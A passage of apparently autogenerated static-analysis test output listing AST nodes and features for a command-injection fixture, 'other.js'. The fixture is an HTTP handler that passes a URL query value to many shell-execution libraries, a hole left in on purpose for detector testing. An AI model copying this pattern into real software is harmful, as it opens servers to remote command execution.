ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:13:14:25 | "cross-spawn" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:28:14:30 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | exceptional return of require ... async") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | exceptional return of require ... async") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | exceptional return of require ... async") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | exceptional return of require ... async") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | exceptional return of require ... async") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | exceptional return of require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | exceptional return of require ... ")(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | exceptional return of require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | exceptional return of require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | exceptional return of require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:13:15:31 | "cross-spawn-async" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | calleeImports | cross-spawn-async | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:34:15:36 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | exceptional return of require("exec") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | exceptional return of require("exec") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | exceptional return of require("exec") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | exceptional return of require("exec") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | exceptional return of require("exec") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | exceptional return of require("exec")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | exceptional return of require("exec")(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | exceptional return of require("exec")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | exceptional return of require("exec")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | exceptional return of require("exec")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:13:16:18 | "exec" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:21:16:23 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | exceptional return of require ... async") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | exceptional return of require ... async") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | exceptional return of require ... async") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | exceptional return of require ... async") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | exceptional return of require ... async") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | exceptional return of require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | exceptional return of require ... ")(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | exceptional return of require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | exceptional return of require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | exceptional return of require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | calleeImports | | +| 